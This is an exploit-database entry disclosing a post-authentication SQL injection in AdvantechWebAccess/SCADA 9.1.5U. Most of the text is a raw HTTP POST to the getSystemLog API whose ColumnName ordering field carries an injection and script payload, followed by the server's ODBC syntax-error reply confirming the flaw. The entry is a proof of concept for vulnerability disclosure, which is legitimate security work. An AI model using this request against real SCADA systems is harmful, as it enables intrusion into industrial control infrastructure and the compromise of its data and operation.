Share
## https://sploitus.com/exploit?id=PACKETSTORM:176418
;; PostAuth SQLi in AdvantechWeb/SCADA 9.1.5U  
;;   
;; found: 28.12.2023  
;;  
;; more:   
;; https://code610.blogspot.com/2024/01/postauth-sqli-in-advantechwebscada-915u.html  
;;   
  
  
POST /waconfig/api/odbc/getSystemLog HTTP/2  
Host: 192.168.56.106  
Cookie: serverLanguage=en; csrfToken=a2db29e5-68f5-4cae-917c-41767ee92911-1837; pcname=MSEDGEWIN10; rpcPort=4592; accessCode=qweqwe; socketPort=14592; account=admin; ASPSESSIONIDQWBDCRDA=MCKNMBPCPEFMMGDHFCIICAGA; ASPSESSIONIDQSBDCRDA=NCKNMBPCOGIENOGNONBOFBFF; ASP.NET_SessionId=zgqgjalvaa0x1kpcdj3ke2di; user=name=; ASPSESSIONIDCGTAATDA=OCEJBDPCJIJLPKAFFGOGHPAN  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0  
Accept: application/json, text/plain, */*  
Accept-Language: pl,en-US;q=0.7,en;q=0.3  
Accept-Encoding: gzip, deflate, br  
Content-Type: application/json;charset=utf-8  
Content-Length: 359  
Origin: https://192.168.56.106  
Referer: https://192.168.56.106/waconfig/index  
Sec-Fetch-Dest: empty  
Sec-Fetch-Mode: cors  
Sec-Fetch-Site: same-origin  
Te: trailers  
Connection: keep-alive  
  
{"csrfToken":"a2db29e5-68f5-4cae-917c-41767ee92911-1837","StartDateTime":"12/28/2023 00:00:00","EndDateTime":"12/28/2023 22:20:46","Action":[2,3,4,5,6,7,8,9,10,11,13,14,15,16,12],"UserName":"ALL","IPAddress":"ALL","NodeName":"ALL","ProjName":"ALL","Orders":[{"ColumnName":"%27>%22><svg/onload=prompt(123)>","descending":"DESC"}],"PageSize":50,"CurrentPage":1}  
  
  
  
resp:  
  
HTTP/2 200 OK  
Cache-Control: no-cache  
Pragma: no-cache  
Content-Length: 225  
Content-Type: application/json; charset=utf-8  
Expires: -1  
Server: Microsoft-IIS/10.0  
X-Ua-Compatible: IE=EmulateIE7  
Access-Control-Allow-Origin: http://localhost:8080  
Access-Control-Allow-Methods: GET,POST,OPTIONS  
Access-Control-Allow-Headers: Content-Type  
Access-Control-Allow-Credentials: true  
Strict-Transport-Security: max-age=31536000;includeSubDomains;preload  
X-Content-Type-Options: nosniff  
Date: Thu, 28 Dec 2023 21:29:56 GMT  
  
{"error":-500,"reason":"Exception captured by WebApiExceptionFilter: ERROR [42000] [Microsoft][ODBC Microsoft Access Driver] Syntax error in query expression \u0027%27\u003e%22\u003e\u003csvg/onload=prompt(123)\u003e\u0027."}  
  
  
;; cheers  
;;